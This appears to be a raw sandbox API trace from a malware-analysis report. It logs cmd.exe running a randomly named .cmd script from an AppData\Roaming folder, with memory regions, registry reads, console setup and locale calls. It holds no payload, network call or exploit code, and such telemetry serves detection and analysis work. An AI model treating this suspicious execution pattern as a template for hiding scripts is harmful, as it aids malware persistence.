0x91 [0103.664] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x16f554, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x16f554*=0x0, lpOverlapped=0x0) returned 1 [0103.664] GetLastError () returned 0x0 [0103.664] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.664] GetFileType (hFile=0x54) returned 0x1 [0103.664] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.664] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0103.664] longjmp () [0103.665] _tell (_FileHandle=3) returned 145 [0103.665] _close (_FileHandle=3) returned 0 [0103.665] CmdBatNotification () returned 0x0 [0103.665] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.665] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0103.665] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.665] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0103.665] _get_osfhandle (_FileHandle=0) returned 0x3 [0103.665] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0103.665] SetConsoleInputExeNameW () returned 0x1 [0103.665] GetConsoleOutputCP () returned 0x1b5 [0103.666] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0103.666] SetThreadUILanguage (LangId=0x0) returned 0x409 [0103.666] exit (_Code=0) Process: id = "22" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16820" os_pid = "0xbe8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "20" os_parent_pid = "0xbbc" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1460 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1461 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1462 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1463 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1464 start_va = 0x4a0f0000 end_va = 0x4a13bfff entry_point = 0x4a0f0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1465 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1466 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1467 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1468 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1469 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1636 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1637 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1638 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1639 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1640 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1641 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1642 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1643 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1644 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1645 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1646 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1647 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1648 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1649 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1650 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 1651 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1652 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1653 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1654 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1655 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1656 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1657 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1658 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1659 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Region: id = 1705 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1706 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1707 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1708 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1709 start_va = 0x12c0000 end_va = 0x158efff entry_point = 0x12c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 31 os_tid = 0xbec [0100.073] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fb5c | out: lpSystemTimeAsFileTime=0x22fb5c*(dwLowDateTime=0x79a7e520, dwHighDateTime=0x1d440a9)) [0100.073] GetCurrentProcessId () returned 0xbe8 [0100.073] GetCurrentThreadId () returned 0xbec [0100.073] GetTickCount () returned 0x23e85 [0100.073] QueryPerformanceCounter (in: lpPerformanceCount=0x22fb54 | out: lpPerformanceCount=0x22fb54*=15686220301) returned 1 [0100.074] GetModuleHandleA (lpModuleName=0x0) returned 0x4a0f0000 [0100.074] __set_app_type (_Type=0x1) [0100.074] __p__fmode () returned 0x76b331f4 [0100.074] __p__commode () returned 0x76b331fc [0100.074] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1121a6) returned 0x0 [0100.074] __getmainargs (in: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c, _DoWildCard=0, _StartInfo=0x4a114140 | out: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c) returned 0 [0100.074] GetCurrentThreadId () returned 0xbec [0100.075] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbec) returned 0x38 [0100.075] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0100.075] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0100.075] SetThreadUILanguage (LangId=0x0) returned 0x409 [0100.075] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0100.075] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22faec | out: phkResult=0x22faec*=0x0) returned 0x2 [0100.075] VirtualQuery (in: lpAddress=0x22fb23, lpBuffer=0x22fabc, dwLength=0x1c | out: lpBuffer=0x22fabc*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0100.075] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fabc, dwLength=0x1c | out: lpBuffer=0x22fabc*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0100.075] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fabc, dwLength=0x1c | out: lpBuffer=0x22fabc*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0100.075] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fabc, dwLength=0x1c | out: lpBuffer=0x22fabc*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0100.075] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fabc, dwLength=0x1c | out: lpBuffer=0x22fabc*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0100.075] GetConsoleOutputCP () returned 0x1b5 [0100.075] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0100.076] SetConsoleCtrlHandler (HandlerRoutine=0x4a10e72a, Add=1) returned 1 [0100.076] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.076] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0100.076] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.076] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0100.076] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.076] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0100.077] _get_osfhandle (_FileHandle=0) returned 0x3 [0100.077] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0100.077] _get_osfhandle (_FileHandle=0) returned 0x3 [0100.077] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0100.078] GetEnvironmentStringsW () returned 0x320150* [0100.078] FreeEnvironmentStringsW (penv=0x320150) returned 1 [0100.078] GetEnvironmentStringsW () returned 0x320150* [0100.078] FreeEnvironmentStringsW (penv=0x320150) returned 1 [0100.078] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ea5c | out: phkResult=0x22ea5c*=0x40) returned 0x0 [0100.078] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ea64, lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x0, lpData=0x22ea68*=0x0, lpcbData=0x22ea60*=0x1000) returned 0x2 [0100.078] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ea64, lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x4, lpData=0x22ea68*=0x1, lpcbData=0x22ea60*=0x4) returned 0x0 [0100.078] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ea64, lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x0, lpData=0x22ea68*=0x1, lpcbData=0x22ea60*=0x1000) returned 0x2 [0100.078] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ea64, lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x4, lpData=0x22ea68*=0x0, lpcbData=0x22ea60*=0x4) returned 0x0 [0100.078] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ea64, lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x4, lpData=0x22ea68*=0x40, lpcbData=0x22ea60*=0x4) returned 0x0 [0100.079] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ea64, lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x4, lpData=0x22ea68*=0x40, lpcbData=0x22ea60*=0x4) returned 0x0 [0100.079] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ea64, lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x0, lpData=0x22ea68*=0x40, lpcbData=0x22ea60*=0x1000) returned 0x2 [0100.079] RegCloseKey (hKey=0x40) returned 0x0 [0100.079] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ea5c | out: phkResult=0x22ea5c*=0x40) returned 0x0 [0100.079] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ea64, lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x0, lpData=0x22ea68*=0x40, lpcbData=0x22ea60*=0x1000) returned 0x2 [0100.079] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ea64, lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x4, lpData=0x22ea68*=0x1, lpcbData=0x22ea60*=0x4) returned 0x0 [0100.079] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ea64, lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x0, lpData=0x22ea68*=0x1, lpcbData=0x22ea60*=0x1000) returned 0x2 [0100.079] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ea64, lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x4, lpData=0x22ea68*=0x0, lpcbData=0x22ea60*=0x4) returned 0x0 [0100.079] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ea64, lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x4, lpData=0x22ea68*=0x9, lpcbData=0x22ea60*=0x4) returned 0x0 [0100.079] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ea64, lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x4, lpData=0x22ea68*=0x9, lpcbData=0x22ea60*=0x4) returned 0x0 [0100.079] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ea64, lpData=0x22ea68, lpcbData=0x22ea60*=0x1000 | out: lpType=0x22ea64*=0x0, lpData=0x22ea68*=0x9, lpcbData=0x22ea60*=0x1000) returned 0x2 [0100.079] RegCloseKey (hKey=0x40) returned 0x0 [0100.079] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88634d [0100.079] srand (_Seed=0x5b88634d) [0100.079] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd\"" [0100.079] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd\"" [0100.079] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0100.080] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3219b8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0100.080] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0100.080] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0100.080] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0100.080] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0100.080] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0100.080] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0100.080] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0100.080] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0100.080] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0100.080] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0100.080] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0100.080] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0100.080] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0100.080] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f828 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0100.081] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f828, lpFilePart=0x22f824 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f824*="Desktop") returned 0x18 [0100.081] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0100.081] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f5a4 | out: lpFindFileData=0x22f5a4) returned 0x31ffe0 [0100.081] FindClose (in: hFindFile=0x31ffe0 | out: hFindFile=0x31ffe0) returned 1 [0100.081] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f5a4 | out: lpFindFileData=0x22f5a4) returned 0x31ffe0 [0100.081] FindClose (in: hFindFile=0x31ffe0 | out: hFindFile=0x31ffe0) returned 1 [0100.081] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f5a4 | out: lpFindFileData=0x22f5a4) returned 0x31ffe0 [0100.081] FindClose (in: hFindFile=0x31ffe0 | out: hFindFile=0x31ffe0) returned 1 [0100.081] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0100.082] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0100.082] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0100.082] GetEnvironmentStringsW () returned 0x320150* [0100.082] FreeEnvironmentStringsW (penv=0x320150) returned 1 [0100.082] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0100.087] GetConsoleOutputCP () returned 0x1b5 [0100.087] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0100.087] GetUserDefaultLCID () returned 0x409 [0100.087] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a114950, cchData=8 | out: lpLCData=":") returned 2 [0100.087] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f968, cchData=128 | out: lpLCData="0") returned 2 [0100.087] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f968, cchData=128 | out: lpLCData="0") returned 2 [0100.087] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f968, cchData=128 | out: lpLCData="1") returned 2 [0100.087] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a114940, cchData=8 | out: lpLCData="/") returned 2 [0100.087] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a114d80, cchData=32 | out: lpLCData="Mon") returned 4 [0100.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a114d40, cchData=32 | out: lpLCData="Tue") returned 4 [0100.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a114d00, cchData=32 | out: lpLCData="Wed") returned 4 [0100.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a114cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0100.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a114c80, cchData=32 | out: lpLCData="Fri") returned 4 [0100.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a114c40, cchData=32 | out: lpLCData="Sat") returned 4 [0100.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a114c00, cchData=32 | out: lpLCData="Sun") returned 4 [0100.088] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a114930, cchData=8 | out: lpLCData=".") returned 2 [0100.088] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a114920, cchData=8 | out: lpLCData=",") returned 2 [0100.088] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0100.089] GetConsoleTitleW (in: lpConsoleTitle=0x3201e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0100.201] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0100.201] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0100.201] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0100.201] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0100.205] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd", _String2=")") returned 58 [0100.205] _wcsicmp (_String1="FOR", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd") returned 3 [0100.205] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd") returned 3 [0100.205] _wcsicmp (_String1="IF", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd") returned 6 [0100.205] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd") returned 6 [0100.206] _wcsicmp (_String1="REM", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd") returned 15 [0100.206] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd") returned 15 [0100.206] GetConsoleTitleW (in: lpConsoleTitle=0x22f660, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0100.206] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0100.207] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0100.207] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22f41c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22f414, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22f414*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0100.207] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0100.207] SetErrorMode (uMode=0x0) returned 0x0 [0100.207] SetErrorMode (uMode=0x1) returned 0x0 [0100.208] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.", nBufferLength=0x208, lpBuffer=0x32dc08, lpFilePart=0x22f180 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy", lpFilePart=0x22f180*="vMfCCeRYkvQy") returned 0x2d [0100.208] SetErrorMode (uMode=0x0) returned 0x1 [0100.208] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.") returned 1 [0100.209] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 